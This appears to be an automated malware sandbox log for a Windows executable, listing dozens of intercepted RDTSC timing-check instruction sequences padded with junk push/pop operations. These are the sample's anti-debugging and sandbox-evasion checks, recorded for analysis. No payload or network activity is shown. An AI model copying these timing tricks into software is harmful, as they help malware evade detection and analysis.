              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0E14 second address: 7D0E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D0E1D second address: 7D0E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D152D second address: 7D1535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D1535 second address: 7D1539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D1539 second address: 7D1543 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F08C2F7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D865D second address: 7D8661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D8661 second address: 7D8665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D87BB second address: 7D87C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D87C0 second address: 7D87C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7D87C5 second address: 7D87CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7DE390 second address: 7DE3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F08C2F7D6h 0x0000000a jmp 00007F9F08C2F7DDh 0x0000000f popad 0x00000010 jmp 00007F9F08C2F7DAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F9F08C2F7D6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E0FDB second address: 7E0FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E0FE3 second address: 7E1004 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2F7D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F9F08C2F7DEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1004 second address: 7E1008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1008 second address: 7E100C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E100C second address: 7E1015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1015 second address: 7E101D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E101D second address: 7E1026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E1026 second address: 7E102C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7E102C second address: 7E1030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE3E1 second address: 7EE402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9F08C2F7DDh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE402 second address: 7EE41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C3h 0x00000007 jp 00007F9F08C2E4B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE41F second address: 7EE46A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9F08C2F7D6h 0x00000009 jmp 00007F9F08C2F7E9h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F9F08C2F7E9h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE46A second address: 7EE473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7EE473 second address: 7EE47D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0DCA second address: 7F0DD7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F08C2E4B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0726 second address: 7F0761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F9F08C2F7E6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F9F08C2F7D6h 0x00000013 jmp 00007F9F08C2F7E7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0761 second address: 7F0779 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F08C2E4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F9F08C2E4BAh 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0779 second address: 7F0781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0781 second address: 7F0785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0785 second address: 7F07AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F9F08C2F7E2h 0x0000000f jnc 00007F9F08C2F7D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F0916 second address: 7F091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E2B second address: 7F2E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 jmp 00007F9F08C2F7DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E58 second address: 7F2E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E62 second address: 7F2E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jng 00007F9F08C2F7DEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E73 second address: 7F2E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2E77 second address: 7F2E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F9F08C2F7D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F2BB9 second address: 7F2BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F95E0 second address: 7F95E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F95E6 second address: 7F95F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4BCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 7F95F2 second address: 7F9603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2F7DAh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 800CFC second address: 800D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 800D00 second address: 800D05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 808DC7 second address: 808DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9F08C2E4B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807924 second address: 807997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2F7D6h 0x0000000a jnp 00007F9F08C2F7D6h 0x00000010 popad 0x00000011 jmp 00007F9F08C2F7E8h 0x00000016 jp 00007F9F08C2F7E8h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9F08C2F7DDh 0x00000024 pushad 0x00000025 jmp 00007F9F08C2F7DFh 0x0000002a push edi 0x0000002b pop edi 0x0000002c jmp 00007F9F08C2F7DFh 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807997 second address: 8079A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F9F08C2E4B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807C96 second address: 807C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807C9C second address: 807CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807CA1 second address: 807CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807CAD second address: 807CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807E1E second address: 807E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F9F08C2F7D6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 807E2A second address: 807E3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F9F08C2E4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 8080BA second address: 8080C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 8080C0 second address: 8080D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4BCh 0x0000000a jp 00007F9F08C2E4B6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 8080D0 second address: 8080E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 8080E4 second address: 8080EE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2E4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 808B05 second address: 808B23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F08C2F7D6h 0x00000008 jmp 00007F9F08C2F7E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 80CB8E second address: 80CB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 80E48D second address: 80E493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 80E60A second address: 80E60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 80E60E second address: 80E625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F9F08C2F7DCh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 812E12 second address: 812E1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 812E1C second address: 812E22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 812E22 second address: 812E41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 812E41 second address: 812E47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 722025 second address: 722050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C8h 0x00000007 jmp 00007F9F08C2E4BBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 722050 second address: 722054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 818D11 second address: 818D45 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F08C2E4BCh 0x00000008 push ebx 0x00000009 jmp 00007F9F08C2E4C6h 0x0000000e jc 00007F9F08C2E4B6h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 818D45 second address: 818D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F9F08C2F7DFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 818D5C second address: 818D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 81C1AF second address: 81C1B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 81C1B8 second address: 81C1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 81C1C1 second address: 81C1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 8254FF second address: 825513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BDh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 825513 second address: 825518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 825518 second address: 82555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BEh 0x00000009 jmp 00007F9F08C2E4C2h 0x0000000e popad 0x0000000f push edi 0x00000010 jmp 00007F9F08C2E4C0h 0x00000015 pop edi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F9F08C2E4B6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 820574 second address: 820584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F9F08C2F7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 820584 second address: 820588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 831C84 second address: 831C8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 831940 second address: 83195F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9F08C2E4C8h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 83195F second address: 831969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9F08C2F7D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84747E second address: 847484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 8463B2 second address: 8463F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E6h 0x00000007 push ecx 0x00000008 jp 00007F9F08C2F7D6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jp 00007F9F08C2F7EBh 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 846C35 second address: 846C3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 846F06 second address: 846F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84A319 second address: 84A31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84B502 second address: 84B508 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84B508 second address: 84B50E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84B50E second address: 84B512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84B512 second address: 84B516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84B516 second address: 84B51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84CC56 second address: 84CC63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84CC63 second address: 84CC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 84CC67 second address: 84CC7E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F08C2E4B6h 0x00000008 jmp 00007F9F08C2E4BDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76EB29 second address: 76EB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
